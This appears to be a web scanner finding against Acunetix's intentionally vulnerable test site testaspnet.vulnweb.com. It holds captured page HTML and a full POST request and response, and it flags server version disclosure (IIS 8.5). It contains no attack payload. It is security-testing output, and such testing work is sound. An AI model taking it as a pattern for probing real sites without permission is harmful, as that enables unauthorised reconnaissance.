mVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
